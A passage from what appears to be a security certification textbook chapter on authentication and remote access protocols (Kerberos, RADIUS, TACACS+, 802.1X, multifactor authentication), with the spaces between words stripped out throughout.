Identitytheftandcommercialespionagehavebecomeverylargeandlucrativecriminalenterprisesoverthepastdecade.Hackersarenolongermerelycontenttocompromisesystemsanddefacewebsites.Inmanyattacksperformedtoday,hackersareafterintellectualproperty,businessplans,competitiveintelligence,personalinformation,creditcardnumbers,clientrecords,oranyotherinformationthatcanbesold,traded,ormanipulatedforprofit.Thishascreatedawholeindustryoftechnicalsolutionslabeleddatalossprevention(DLP)solutions.Itcanbeassumedthatahackerhasassumedtheidentityofan
authorizeduser,andDLPsolutionsexisttopreventtheexfiltrationofdataregardlessofaccesscontrolrestrictions.DLPsolutionscomeinmanyforms,andeachofthesesolutionshasstrengthsandweaknesses.Thebestsolutionisacombinationofsecurityelements,sometosecuredatainstorage(encryption)andsomeintheformofmonitoring(proxydevicestomonitordataegressforsensitivedata),andevenNetFlowanalyticstoidentifynewbulkdatatransferroutes.
TheRemoteAccessProcessTheprocessofconnectingbyremoteaccessinvolvestwoelements:atemporarynetworkconnectionandaseriesofprotocolstonegotiateprivilegesandcommands.Thetemporarynetworkconnectioncanoccurviaadial-upservice,theInternet,wirelessaccess,oranyothermethodofconnectingtoanetwork.Oncetheconnectionismade,theprimaryissueisauthenticatingtheidentityoftheuserandestablishingproperprivilegesforthatuser.Thisisaccomplishedusingacombinationofprotocolsandtheoperatingsystemonthehostmachine.Thethreestepsintheestablishmentofproperprivilegesare
authentication,authorization,andaccounting,commonlyreferredtosimplyasAAA.Authenticationisthematchingofuser-suppliedcredentialstopreviouslystoredcredentialsonahostmachine,anditusuallyinvolvesanaccountusernameandpassword.Oncetheuserisauthenticated,theauthorizationsteptakesplace.Authorizationisthe
grantingofspecificpermissionsbasedontheprivilegesheldbytheaccount.Doestheuserhavepermissiontousethenetworkatthistime,orisheruserestricted?Doestheuserhaveaccesstospecificapplications,suchasmailandFTP,oraresomeoftheserestricted?Thesechecksarecarriedoutaspartofauthorization,andinmanycasesthisisafunctionoftheoperatingsysteminconjunctionwithitsestablishedsecuritypolicies.Accountingisthecollectionofbillingandotherdetailrecords.Networkaccessisoftenabillablefunction,andalogofhowmuchtime,bandwidth,filetransferspace,orotherresourceswereusedneedstobemaintained.Otheraccountingfunctionsincludekeepingdetailedsecuritylogstomaintainanaudittrailoftasksbeingperformed.
TechTip
SecuringRemoteConnectionsByusingencryption,remoteaccessprotocolscansecurelyauthenticateandauthorizeauseraccordingtopreviouslyestablishedprivilegelevels.Theauthorizationphasecankeepunauthorizedusersout,butafterthat,encryptionofthecommunicationschannelbecomesveryimportantinpreventingnonauthorizedusersfrombreakinginonanauthorizedsessionandhijackinganauthorizeduser’scredentials.AsmoreandmorenetworksrelyontheInternetforconnectingremoteusers,theneedforandimportanceofsecureremoteaccessprotocolsandsecurecommunicationchannelswillcontinuetogrow.
WhenauserconnectstotheInternetthroughanISP,thisissimilarlyacaseofremoteaccess—theuserisestablishingaconnectiontoherISP’snetwork,andthesamesecurityissuesapply.Theissueofauthentication,thematchingofuser-suppliedcredentialstopreviouslystoredcredentialsonahostmachine,isusuallydoneviaauseraccountnameandpassword.Oncetheuserisauthenticated,theauthorizationsteptakesplace.Remoteauthenticationusuallytakesthecommonformofanendusersubmittinghiscredentialsviaanestablishedprotocoltoaremoteaccessserver(RAS),whichactsuponthosecredentials,eithergrantingordenyingaccess.
Accesscontrolsdefinewhatactionsausercanperformorwhatobjectsauserisallowedtoaccess.Accesscontrolsarebuiltuponthefoundationofelementsdesignedtofacilitatethematchingofausertoaprocess.Theseelementsareidentification,authentication,andauthorization.Thereareamyriadofdetailsandchoicesassociatedwithsettingupremoteaccesstoanetwork,andtoprovideforthemanagementoftheseoptions,itisimportantforanorganizationtohaveaseriesofremoteaccesspoliciesandproceduresspellingoutthedetailsofwhatispermittedandwhatisnotforagivennetwork.
IdentificationIdentificationistheprocessofascribingacomputerIDtoaspecificuser,computer,networkdevice,orcomputerprocess.Theidentificationprocessistypicallyperformedonlyonce,whenauserIDisissuedtoaparticularuser.Useridentificationenablesauthenticationandauthorizationtoformthebasisforaccountability.Foraccountabilitypurposes,userIDsshouldnotbeshared,andforsecuritypurposes,theyshouldnotbedescriptiveofjobfunction.Thispracticeenablesyoutotraceactivitiestoindividualusersorcomputerprocessessothattheycanbeheldresponsiblefortheiractions.IdentificationlinksthelogonIDoruserIDtocredentialsthathavebeensubmittedpreviouslytoeitherHRortheITstaff.ArequiredcharacteristicofuserIDsisthattheymustbeuniquesothattheymapbacktothecredentialspresentedwhentheaccountwasestablished.
TechTip
FederationFederatedidentitymanagementisanagreementbetweenmultipleenterprisesthatletspartiesusethesameidentificationdatatoobtainaccesstothenetworksofallenterprisesinthegroup.Thisfederationenablesaccesstobemanagedacrossmultiplesystemsincommontrustlevels.
AuthenticationAuthenticationistheprocessofbindingaspecificIDtoaspecificcomputerconnection.Twoitemsneedtobepresentedtocausethisbindingtooccur—theuserID,andsome“secret”toprovethattheuseristhevalidpossessorofthecredentials.Historically,threecategoriesofsecretsareusedtoauthenticatetheidentityofauser:whatusersknow,whatusershave,andwhatusersare.Todayanadditionalcategoryisused:whatusersdo.Thesemethodscanbeusedindividuallyorincombination.These
controlsassumethattheidentificationprocesshasbeencompletedandtheidentityoftheuserhasbeenverified.Itisthejobofauthenticationmechanismstoensurethatonlyvalidusersareadmitted.Describedanotherway,authenticationisusingsomemechanismtoprovethatyouarewhoyouclaimedtobewhentheidentificationprocesswascompleted.Themostcommonmethodofauthenticationistheuseofapassword.
Forgreatersecurity,youcanaddanelementfromaseparategroup,suchasasmartcardtoken—somethingauserhasinherpossession.Passwordsarecommonbecausetheyareoneofthesimplestformsanduseusermemoryasaprimecomponent.Becauseoftheirsimplicity,passwordshavebecomeubiquitousacrossawiderangeofauthenticationsystems.Anothermethodtoprovideauthenticationinvolvestheuseofsomething
thatonlyvalidusersshouldhaveintheirpossession.Aphysical-worldexampleofthiswouldbeasimplelockandkey.Onlythoseindividualswiththecorrectkeywillbeabletoopenthelockandthusgainadmittancetoahouse,car,office,orwhateverthelockwasprotecting.Asimilarmethodcanbeusedtoauthenticateusersforacomputersystemornetwork(thoughthekeymaybeelectronicandcouldresideonasmartcardorsimilardevice).Theproblemwiththistechnology,however,isthatpeopledolosetheirkeys(orcards),whichmeansnotonlythattheusercan’tlogintothesystembutthatsomebodyelsewhofindsthekeymaythenbeabletoaccessthesystem,eventhoughtheyarenotauthorized.Toaddressthisproblem,acombinationofthesomething-you-knowandsomething-you-
havemethodsisoftenusedsothattheindividualwiththekeyisalsorequiredtoprovideapasswordorpasscode.Thekeyisuselessunlesstheuserknowsthiscode.
TechTip
CategoriesofSharedSecretsforAuthenticationOriginallypublishedbytheU.S.governmentinoneofthe“rainbowseries”ofmanualsoncomputersecurity,thecategoriesofshared“secrets”are
Whatusersknow(suchasapassword)Whatusershave(suchastokens)
Whatusersare(staticbiometricssuchasfingerprintsoririspattern)Today,becauseoftechnologicaladvances,anewcategoryhasemerged,patternedaftersubconsciousbehavior:
Whatusersdo(dynamicbiometricssuchastypingpatternsorgait)
Thethirdgeneralmethodtoprovideauthenticationinvolvessomethingthatisuniqueaboutyou.Weareaccustomedtothisconceptinourphysicalworld,whereourfingerprintsorasampleofourDNAcanbeusedtoidentifyus.Thissameconceptcanbeusedtoprovideauthenticationinthecomputerworld.Thefieldofauthenticationthatusessomethingaboutyouorsomethingthatyouareisknownasbiometrics.Anumberofdifferentmechanismscanbeusedtoaccomplishthistypeofauthentication,suchasafingerprint,iris,retinal,orhandgeometryscan.Allofthesemethodsobviouslyrequiresomeadditionalhardwareinordertooperate.Theinclusionoffingerprintreadersonlaptopcomputersisbecomingcommonastheadditionalhardwareisbecomingcosteffective.Anewmethod,basedonhowusersperformanaction,suchastheirgait
whenwalking,ortypingpatternshasemergedasasourceofapersonal“signature”.Whilenotdirectlyembeddedintosystemsasyet,thisisanoptionthatwillbecominginthefuture.
Whilethethreemainapproachestoauthenticationappeartobeeasytounderstandandinmostcaseseasytoimplement,authenticationisnottobetakenlightly,sinceitissuchanimportantcomponentofsecurity.Potentialattackersareconstantlysearchingforwaystogetpastthesystem’sauthenticationmechanism,andtheyhaveemployedsomefairlyingeniousmethodstodoso.Consequently,securityprofessionalsareconstantlydevisingnewmethods,buildingonthesethreebasicapproaches,toprovideauthenticationmechanismsforcomputersystemsandnetworks.
BasicAuthenticationBasicauthenticationisthesimplesttechniqueusedtomanageaccesscontrolacrossHTTP.BasicauthenticationoperatesbypassinginformationencodedinBase64formusingstandardHTTPheaders.Thisisaplaintextmethodwithoutanypretenseofsecurity.Figure11.15illustratestheoperationofbasicauthentication.
•Figure11.15Howbasicauthenticationoperates
DigestAuthenticationDigestauthenticationisamethodusedtonegotiatecredentialsacrosstheWeb.Digestauthenticationuseshashfunctionsandanoncetoimprovesecurityoverbasicauthentication.Digestauthenticationworksasfollows,asillustratedinFigure11.16:
•Figure11.16Howdigestauthenticationoperates
1.Theclientrequestslogin.2.Theserverrespondswithachallengeandprovidesanonce.3.Theclienthashesthepasswordandnonce.4.Theclientreturnsthehashedpasswordtotheserver.
5.Theserverrequeststhepasswordfromapasswordstore.6.Theserverhashesthepasswordandnonce.7.Ifbothhashesmatch,loginisgranted.Digestauthentication,althoughitimprovessecurityoverbasic
authentication,doesnotprovideanysignificantlevelofsecurity.Passwordsarenotsentintheclear.Digestauthenticationissubjecttoman-in-the-middleattacksandpotentiallyreplayattacks.
ExamTip:Thebottomlineforbothbasicanddigestauthenticationisthattheseareinsecuremethodsandshouldnotberelieduponforanylevelofsecurity.
KerberosDevelopedaspartofMIT’sprojectAthena,Kerberosisanetworkauthenticationprotocoldesignedforaclient/serverenvironment.ThecurrentversionisKerberos5release1.13.2andissupportedbyallmajoroperatingsystems.KerberossecurelypassesasymmetrickeyoveraninsecurenetworkusingtheNeedham-Schroedersymmetrickeyprotocol.Kerberosisbuiltaroundtheideaofatrustedthirdparty,termedakeydistributioncenter(KDC),whichconsistsoftwologicallyseparateparts:anauthenticationserver(AS)andaticket-grantingserver(TGS).Kerberoscommunicatesvia“tickets”thatservetoprovetheidentityofusers.
ExamTip:TwoticketsareusedinKerberos.Thefirstisaticket-grantingticket(TGT)obtainedfromtheauthenticationserver(AS).TheTGTispresentedtoaticket-grantingserver(TGS)whenaccesstoaserverisrequestedandaclient-to-serverticketisissued,grantingaccesstotheserver.TypicallyboththeASandtheTGSarelogicallyseparatepartsofthekeydistributioncenter
(KDC).
Takingitsnamefromthethree-headeddogofGreekmythology,KerberosisdesignedtoworkacrosstheInternet,aninherentlyinsecureenvironment.Kerberosusesstrongencryptionsothataclientcanproveitsidentitytoaserverandtheservercaninturnauthenticateitselftotheclient.AcompleteKerberosenvironmentisreferredtoasaKerberosrealm.TheKerberosservercontainsuserIDsandhashedpasswordsforallusersthatwillhaveauthorizationstorealmservices.TheKerberosserveralsohassharedsecretkeyswitheveryservertowhichitwillgrantaccesstickets.ThebasisforauthenticationinaKerberosenvironmentistheticket.
Ticketsareusedinatwo-stepprocesswiththeclient.Thefirstticketisaticket-grantingticket(TGT)issuedbytheAStoarequestingclient.TheclientcanthenpresentthistickettotheKerberosserverwitharequestforatickettoaccessaspecificserver.Thisclient-to-serverticket(alsocalledaserviceticket)isusedtogainaccesstoaserver’sserviceintherealm.Sincetheentiresessioncanbeencrypted,thiseliminatestheinherentlyinsecuretransmissionofitemssuchasapasswordthatcanbeinterceptedonthenetwork.Ticketsaretime-stampedandhavealifetime,soattemptingtoreuseaticketwillnotbesuccessful.Figure11.17detailsKerberosoperations.
•Figure11.17Kerberosoperations
TechTip
KerberosAuthenticationKerberosisathird-partyauthenticationservicethatusesaseriesofticketsastokensforauthenticatingusers.Thesixstepsinvolvedareprotectedusingstrongcryptography:
Theuserpresentshiscredentialsandrequestsaticketfromthekeydistributioncenter(KDC).
TheKDCverifiescredentialsandissuesaticket-grantingticket(TGT).
TheuserpresentsaTGTandrequestforservicetotheKDC.TheKDCverifiesauthorizationandissuesaclient-to-serverticket(orserviceticket).
Theuserpresentsarequestandaclient-to-servertickettothedesiredservice.Iftheclient-to-serverticketisvalid,serviceisgrantedtotheclient.
ToillustratehowtheKerberosauthenticationserviceworks,thinkaboutthecommondriver’slicense.Youhavereceivedalicensethatyoucanpresenttootherentitiestoproveyouarewhoyouclaimtobe.Becauseotherentitiestrustthestateinwhichthelicensewasissued,theywillacceptyourlicenseasproofofyouridentity.ThestateinwhichthelicensewasissuedisanalogoustotheKerberosauthenticationservicerealm,andthelicenseactsasaclient-to-serverticket.Itisthetrustedentitybothsidesrelyontoprovidevalididentifications.Thisanalogyisnotperfect,becauseweallprobablyhaveheardofindividualswhoobtainedaphonydriver’slicense,butitservestoillustratethebasicideabehindKerberos.
CertificatesCertificatesareamethodofestablishingauthenticityofspecificobjectssuchasanindividual’spublickeyordownloadedsoftware.Adigitalcertificateisadigitalfilethatissentasanattachmenttoamessageandis
usedtoverifythatthemessagedidindeedcomefromtheentityitclaimstohavecomefrom.DigitalcertificatesarecoveredindetailinChapter6.
CrossCheckDigitalCertificatesandDigitalSignaturesKerberosusesticketstoconveymessages.Partoftheticketisacertificatethatcontainstherequisitekeys.UnderstandinghowcertificatesconveythisvitalinformationisanimportantpartofunderstandinghowKerberos-basedauthenticationworks.CertificatesandhowtheyareusedwascoveredinChapter6,withtheprotocolsassociatedwithPKIcoveredinChapter7.Referbacktothesechaptersasneeded.
TokensAtokenisahardwaredevicethatcanbeusedinachallenge/responseauthenticationprocess.Inthisway,itfunctionsasbothasomething-you-haveandsomething-you-knowauthenticationmechanism.Severalvariationsonthistypeofdeviceexist,buttheyallworkonthesamebasicprinciples.Tokensweredescribedearlierinthechapter,andarecommonlyemployedinremoteauthenticationschemesastheyprovideadditionalsuretyoftheidentityoftheuser,evenuserswhoaresomewhereelseandcannotbeobserved.
ExamTip:Theuseofatokenisacommonmethodofusing“somethingyouhave”forauthentication.Atokencanholdacryptographickeyoractasaone-timepassword(OTP)generator.Itcanalsobeasmartcardthatholdsacryptographickey(examplesincludetheU.S.militaryCommonAccessCardandtheFederalPersonalIdentityVerification[PIV]card).ThesedevicescanbesafeguardedusingaPINandlockoutmechanismtopreventuseifstolen.
MultifactorMultifactorauthenticationisatermthatdescribestheuseofmorethanoneauthenticationmechanismatthesametime.Anexampleofthisisthe
hardwaretoken,whichrequiresbothapersonalIDnumber(PIN)orpasswordandthedeviceitselftodeterminethecorrectresponseinordertoauthenticatetothesystem.Thismeansthatboththesomething-you-haveandsomething-you-knowmechanismsareusedasfactorsinverifyingauthenticityoftheuser.BiometricsarealsooftenusedinconjunctionwithaPINsothatthey,too,canbeusedaspartofamultifactorauthenticationscheme,inthiscasesomethingyouareaswellassomethingyouknow.Thepurposeofmultifactorauthenticationistoincreasethelevelofsecurity,sincemorethanonemechanismwouldhavetobespoofedinorderforanunauthorizedindividualtogainaccesstoacomputersystemornetwork.ThemostcommonexampleofmultifactorsecurityisthecommonATMcardmostofuscarryinourwallets.ThecardisassociatedwithaPINthatonlytheauthorizedcardholdershouldknow.KnowingthePINwithouthavingthecardisuseless,justashavingthecardwithoutknowingthePINwillalsonotprovideyouaccesstoyouraccount.
ExamTip:Therequireduseofmorethanoneauthenticationsystemisknownasmultifactorauthentication.Themostcommonexampleisthecombinationofapasswordwithahardwaretoken.Forhighsecurity,threefactorscanbeused:password,token,andbiometric.
Multifactorauthenticationissometimesreferredtoastwo-factorauthenticationorthree-factorauthentication,referringtothenumberofdifferentfactorsused.Itisimportanttonotethatthisimpliesseparatefactorsfortheauthenticationelement;auserIDandpasswordarenottwofactors,astheuserIDisnotasharedsecretelement.
MutualAuthenticationMutualauthenticationdescribesaprocessinwhicheachsideofanelectroniccommunicationverifiestheauthenticityoftheother.WeareaccustomedtotheideaofhavingtoauthenticateourselvestoourISPbeforeweaccesstheInternet,generallythroughtheuseofauser
ID/passwordpair,buthowdoweactuallyknowthatwearereallycommunicatingwithourISPandnotsomeothersystemthathassomehowinserteditselfintoourcommunication(aman-in-the-middleattack)?Mutualauthenticationprovidesamechanismforeachsideofaclient/serverrelationshiptoverifytheauthenticityoftheothertoaddressthisissue.Acommonmethodofperformingmutualauthenticationinvolvesusingasecureconnection,suchasTransportLayerSecurity(TLS),totheserverandaone-timepasswordgeneratorthatthenauthenticatestheclient.
MutualTLS–basedauthenticationprovidesthesamefunctionsasnormalTLS,withtheadditionofauthenticationandnonrepudiationoftheclient.Thissecondauthentication,theauthenticationoftheclient,isdoneinthesamemannerasthenormalserverauthenticationusingdigitalsignatures.Theclientauthenticationrepresentsthemanysidesofamany-to-onerelationship.MutualTLSauthenticationisnotcommonlyusedbecauseofthecomplexity,cost,andlogisticsassociatedwithmanagingthemultitudeofclientcertificates.Thisreducestheeffectiveness,andmostwebapplicationsarenotdesignedtorequireclient-sidecertificates.
AuthorizationAuthorizationistheprocessofpermittingordenyingaccesstoaspecificresource.Onceidentityisconfirmedviaauthentication,specificactionscanbeauthorizedordenied.Manytypesofauthorizationschemesareused,butthepurposeisthesame:determinewhetheragivenuserwhohasbeenidentifiedhaspermissionsforaparticularobjectorresourcebeingrequested.Thisfunctionalityisfrequentlypartoftheoperatingsystemandistransparenttousers.Theseparationoftasks,fromidentificationtoauthenticationto
authorization,hasseveraladvantages.Manymethodscanbeusedtoperformeachtask,andonmanysystemsseveralmethodsareconcurrentlypresentforeachtask.Separationofthesetasksintoindividualelementsallowscombinationsofimplementationstoworktogether.Anysystemor
resource,beithardware(routerorworkstation)orasoftwarecomponent(databasesystem),thatrequiresauthorizationcanuseitsownauthorizationmethodonceauthenticationhasoccurred.Thismakesforefficientandconsistentapplicationoftheseprinciples.
AccessControlThetermaccesscontrolhasbeenusedtodescribeavarietyofprotectionschemes.Itsometimesreferstoallsecurityfeaturesusedtopreventunauthorizedaccesstoacomputersystemornetwork—orevenanetworkresourcesuchasaprinter.Inthissense,itmaybeconfusedwithauthentication.Moreproperly,accessistheabilityofasubject(suchasanindividualoraprocessrunningonacomputersystem)tointeractwithanobject(suchasafileorhardwaredevice).Oncetheindividualhasverifiedtheiridentity,accesscontrolsregulatewhattheindividualcanactuallydoonthesystem.Justbecauseapersonisgrantedentrytothesystem,thatdoesnotmeanthattheyshouldhaveaccesstoalldatathesystemcontains.
TechTip
AccessControlvs.AuthenticationItmayseemthataccesscontrolandauthenticationaretwowaystodescribethesameprotectionmechanism.This,however,isnotthecase.Authenticationprovidesawaytoverifytothecomputerwhotheuseris.Oncetheuserhasbeenauthenticated,theaccesscontrolsdecidewhatoperationstheusercanperform.Thetwogohand-in-handbutarenotthesamething.
RemoteAccessMethodsWhenauserrequiresaccesstoaremotesystem,theprocessofremoteaccessisusedtodeterminetheappropriatecontrols.Thisisdonethroughaseriesofprotocolsandprocessesdescribedintheremainderofthis
chapter.
IEEE802.1XIEEE802.1Xisanauthenticationstandardthatsupportsport-basedauthenticationservicesbetweenauserandanauthorizationdevice,suchasanedgerouter.IEEE802.1Xisusedbyalltypesofnetworks,includingEthernet,TokenRing,andwireless.Thisstandarddescribesmethodsusedtoauthenticateauserpriortograntingaccesstoanetworkandtheauthenticationserver,suchasaRADIUSserver.802.1Xactsthroughanintermediatedevice,suchasanedgeswitch,enablingportstocarrynormaltrafficiftheconnectionisproperlyauthenticated.Thispreventsunauthorizedclientsfromaccessingthepubliclyavailableportsonaswitch,keepingunauthorizedusersoutofaLAN.Untilaclienthassuccessfullyauthenticateditselftothedevice,onlyExtensibleAuthenticationProtocoloverLAN(EAPOL)trafficispassedbytheswitch.
Onesecurityissueassociatedwith802.1Xisthattheauthenticationoccursonlyuponinitialconnection,andthatanotherusercaninsertthemselvesintotheconnectionbychangingpacketsorusingahub.Thesecuresolutionistopair802.1X,whichauthenticatestheinitialconnection,withaVPNorIPsec,whichprovidespersistentsecurity.
EAPOLisanencapsulatedmethodofpassingEAPmessagesover802.1frames.EAPisageneralprotocolthatcansupportmultiplemethodsofauthentication,includingone-timepasswords,Kerberos,publickeys,andsecuritydevicemethodssuchassmartcards.Onceaclientsuccessfullyauthenticatesitselftothe802.1Xdevice,theswitchopensportsfornormaltraffic.Atthispoint,theclientcancommunicatewiththesystem’sAAAmethod,suchasaRADIUSserver,andauthenticateitselftothenetwork.
WirelessProtocols802.1Xiscommonlyusedonwirelessaccesspointsasaport-basedauthenticationservicepriortoadmissiontothewirelessnetwork.802.1Xoverwirelessuseseither802.11iorEAP-basedprotocols,suchasEAP-TLSorPEAP-TLS.
CrossCheckWirelessRemoteAccessWirelessisacommonmethodofallowingremoteaccesstoanetwork,asitdoesnotrequirephysicalcablingandallowsmobileconnections.Wirelesssecurity,includingprotocolssuchas802.11iandEAP-basedsolutions,iscoveredinChapter12.
RADIUSRemoteAuthenticationDial-InUserService(RADIUS)isanAAAprotocol.ItwassubmittedtotheInternetEngineeringTaskForce(IETF)asaseriesofRFCs:RFC2058(RADIUSspecification),RFC2059(RADIUSaccountingstandard),andupdatedRFCs2865–2869,whicharenowstandardprotocols.RADIUSisdesignedasaconnectionlessprotocolthatusestheUser
DatagramProtocol(UDP)asitstransportlayerprotocol.Connectiontypeissues,suchastimeouts,arehandledbytheRADIUSapplicationinsteadofthetransportlayer.RADIUSutilizesUDPport1812forauthenticationandauthorizationandUDP1813foraccountingfunctions.RADIUSisaclient/serverprotocol.TheRADIUSclientistypicallya
networkaccessserver(NAS).Networkaccessserversactasintermediaries,authenticatingclientsbeforeallowingthemaccesstoanetwork.RADIUS,RRAS(Microsoft),RAS,andVPNserverscanallactasnetworkaccessservers.TheRADIUSserverisaprocessordaemonrunningonaUNIXorWindowsServermachine.CommunicationsbetweenaRADIUSclientandRADIUSserverareencryptedusinga
sharedsecretthatismanuallyconfiguredintoeachentityandnotsharedoveraconnection.Hence,communicationsbetweenaRADIUSclient(typicallyaNAS)andaRADIUSserveraresecure,butthecommunicationsbetweenauser(typicallyaPC)andtheRADIUSclientaresubjecttocompromise.Thisisimportanttonote,foriftheuser’smachine(thePC)isnottheRADIUSclient(theNAS),thencommunicationsbetweenthePCandtheNASaretypicallynotencryptedandarepassedintheclear.
RADIUSAuthenticationTheRADIUSprotocolisdesignedtoallowaRADIUSservertosupportawidevarietyofmethodstoauthenticateauser.Whentheserverisgivenausernameandpassword,itcansupportPoint-to-PointProtocol(PPP),PasswordAuthenticationProtocol(PAP),Challenge-HandshakeAuthenticationProtocol(CHAP),UNIXlogin,andothermechanisms,dependingonwhatwasestablishedwhentheserverwassetup.Auserloginauthenticationconsistsofaquery(Access-Request)fromtheRADIUSclientandacorrespondingresponse(Access-Accept,Access-Challenge,orAccess-Reject)fromtheRADIUSserver,asyoucanseeinFigure11.18.TheAccess-Challengeresponseistheinitiationofachallenge/responsehandshake.Iftheclientcannotsupportchallenge/response,thenittreatstheChallengemessageasanAccess-Reject.
•Figure11.18RADIUScommunicationsequence
TheAccess-Requestmessagecontainstheusername,encryptedpassword,NASIPaddress,andport.Themessagealsocontainsinformationconcerningthetypeofsessiontheuserwantstoinitiate.OncetheRADIUSserverreceivesthisinformation,itsearchesitsdatabaseforamatchontheusername.Ifamatchisnotfound,eitheradefaultprofileisloadedoranAccess-Rejectreplyissenttotheuser.Iftheentryisfoundorthedefaultprofileisused,thenextphaseinvolvesauthorization,forinRADIUS,thesestepsareperformedinsequence.Figure11.18showstheinteractionbetweenauserandtheRADIUSclientandRADIUSserverandthestepstakentomakeaconnection.
RADIUSAuthorizationIntheRADIUSprotocol,theauthenticationandauthorizationstepsareperformedtogetherinresponsetoasingleAccess-Requestmessage,althoughtheyaresequentialsteps(seeFigure11.18).Onceanidentityhasbeenestablished,eitherknownordefault,theauthorizationprocessdetermineswhatparametersarereturnedtotheclient.Typicalauthorizationparametersincludetheservicetypeallowed(shellorframed),theprotocolsallowed,theIPaddresstoassigntotheuser(staticordynamic),andtheaccesslisttoapplyorstaticroutetoplaceintheNASroutingtable.
TechTip
ShellAccountsShellaccountrequestsarethosethatdesirecommand-lineaccesstoaserver.Onceauthenticationissuccessfullyperformed,theclientisconnecteddirectlytotheserversocommand-lineaccesscanoccur.RatherthanbeinggivenadirectIPaddressonthenetwork,theNASactsasapass-throughdeviceconveyingaccess.
TheseparametersarealldefinedintheconfigurationinformationontheRADIUSclientandserverduringsetup.Usingthisinformation,theRADIUSserverreturnsanAccess-AcceptmessagewiththeseparameterstotheRADIUSclient.
RADIUSAccountingTheRADIUSaccountingfunctionisperformedindependentlyofRADIUSauthenticationandauthorization.TheaccountingfunctionusesaseparateUDPport,1813(seeTable11.2inthe“ConnectionSummary”sectionattheendofthechapter).TheprimaryfunctionalityofRADIUSaccountingwasestablishedtosupportISPsintheiruseraccounting,anditsupportstypicalaccountingfunctionsfortimebillingandsecuritylogging.TheRADIUSaccountingfunctionsaredesignedtoallowdatatobetransmittedatthebeginningandendofasession,andtheycanindicateresourceutilization,suchastime,bandwidth,andsoon.
Table11.2 CommonTCP/UDPRemoteAccessNetworkingPortAssignments
DiameterDiameteristhenameofanAAAprotocolsuite,designatedbytheIETFtoreplacetheagingRADIUSprotocol.DiameteroperatesinmuchthesamewayasRADIUSinaclient/serverconfiguration,butitimprovesuponRADIUS,resolvingdiscoveredweaknesses.DiameterisaTCP-based
serviceandhasmoreextensiveAAAcapabilities.Diameterisalsodesignedforalltypesofremoteaccess,notjustmodempools.Asmoreandmoreusersadoptbroadbandandotherconnectionmethods,thesenewerservicesrequiremoreoptionstodeterminepermissibleusageproperlyandtoaccountforandlogtheusage.Diameterisdesignedwiththeseneedsinmind.Diameteralsohasanimprovedmethodofencryptingmessage
exchangestoprohibitreplayandman-in-the-middleattacks.Takenalltogether,Diameter,withitsenhancedfunctionalityandsecurity,isanimprovementontheprovendesignoftheoldRADIUSstandard.
TACACS+TheTerminalAccessControllerAccessControlSystem+(TACACS+)protocolisthecurrentgenerationoftheTACACSfamily.OriginallyTACACSwasdevelopedbyBBNPlanetCorporationforMILNET,anearlymilitarynetwork,butithasbeenenhancedbyCisco,whichhasexpandeditsfunctionalitytwice.TheoriginalBBNTACACSsystemprovidedacombinationprocessofauthenticationandauthorization.CiscoextendedthistoExtendedTerminalAccessControllerAccessControlSystem(XTACACS),whichprovidedforseparateauthentication,authorization,andaccountingprocesses.Thecurrentgeneration,TACACS+,hasextendedattributecontrolandaccountingprocesses.Oneofthefundamentaldesignaspectsistheseparationof
authentication,authorization,andaccountinginthisprotocol.AlthoughthereisastraightforwardlineageoftheseprotocolsfromtheoriginalTACACS,TACACS+isamajorrevisionandisnotbackward-compatiblewithpreviousversionsoftheprotocolseries.TACACS+usesTCPasitstransportprotocol,typicallyoperatingover
TCPport49.ThisportisusedfortheloginprocessandisreservedinRFC3232,“AssignedNumbers,”manifestedinadatabasefromtheInternetAssignedNumbersAuthority(IANA).IntheIANAspecification,bothUDPport49andTCPport49arereservedfortheTACACS+loginhost
protocol(seeTable11.2inthe“ConnectionSummary”sectionattheendofthechapter).TACACS+isaclient/serverprotocol,withtheclienttypicallybeinga
NASandtheserverbeingadaemonprocessonaUNIX,Linux,orWindowsserver.Thisisimportanttonote,foriftheuser’smachine(usuallyaPC)isnottheclient(usuallyaNAS),thencommunicationsbetweenPCandNASaretypicallynotencryptedandarepassedintheclear.CommunicationsbetweenaTACACS+clientandTACACS+serverareencryptedusingasharedsecretthatismanuallyconfiguredintoeachentityandisnotsharedoveraconnection.Hence,communicationsbetweenaTACACS+client(typicallyaNAS)andaTACACS+serveraresecure,butthecommunicationsbetweenauser(typicallyaPC)andtheTACACS+clientaresubjecttocompromise.
TACACS+AuthenticationTACACS+allowsforarbitrarylengthandcontentintheauthenticationexchangesequence,enablingmanydifferentauthenticationmechanismstobeusedwithTACACS+clients.Authenticationisoptionalandisdeterminedasasite-configurableoption.Whenauthenticationisused,commonformsincludePPPPAP,PPPCHAP,PPPEAP,tokencards,andKerberos.Theauthenticationprocessisperformedusingthreedifferentpackettypes:START,CONTINUE,andREPLY.STARTandCONTINUEpacketsoriginatefromtheclientandaredirectedtotheTACACS+server.TheREPLYpacketisusedtocommunicatefromtheTACACS+servertotheclient.TheauthenticationprocessisillustratedinFigure11.19,anditbegins
withaSTARTmessagefromtheclienttotheserver.ThismessagemaybeinresponsetoaninitiationfromaPCconnectedtotheTACACS+client.TheSTARTmessagedescribesthetypeofauthenticationbeingrequested(simpleplaintextpassword,PAP,CHAP,andsoon).ThisSTARTmessagemayalsocontainadditionalauthenticationdata,suchasausernameandpassword.ASTARTmessageisalsosentasaresponsetoarestartrequestfromtheserverinaREPLYmessage.ASTARTmessage
alwayshasitssequencenumbersetto1.
•Figure11.19TACACS+communicationsequence
WhenaTACACS+serverreceivesaSTARTmessage,itsendsaREPLYmessage.ThisREPLYmessageindicateswhethertheauthenticationiscompleteorneedstobecontinued.Iftheprocessneedstobecontinued,theREPLYmessagealsospecifieswhatadditionalinformationisneeded.TheresponsefromaclienttoaREPLYmessagerequestingadditionaldataisaCONTINUEmessage.Thisprocesscontinuesuntiltheserverhasalltheinformationneeded,andtheauthenticationprocessconcludeswithasuccessorfailure.
TACACS+AuthorizationAuthorizationisdefinedasthegrantingofspecificpermissionsbasedontheprivilegesheldbytheaccount.Thisgenerallyoccursafterauthentication,asshowninFigure11.19,butthisisnotafirmrequirement.Adefaultstateof“unknownuser”existsbeforeauserisauthenticated,andpermissionscanbedeterminedforanunknownuser.Aswithauthentication,authorizationisanoptionalprocessandmayormaynotbepartofasite-specificoperation.Whenitisusedinconjunctionwithauthentication,theauthorizationprocessfollowstheauthenticationprocessandusestheconfirmeduseridentityasinputinthedecisionprocess.Theauthorizationprocessisperformedusingtwomessagetypes:
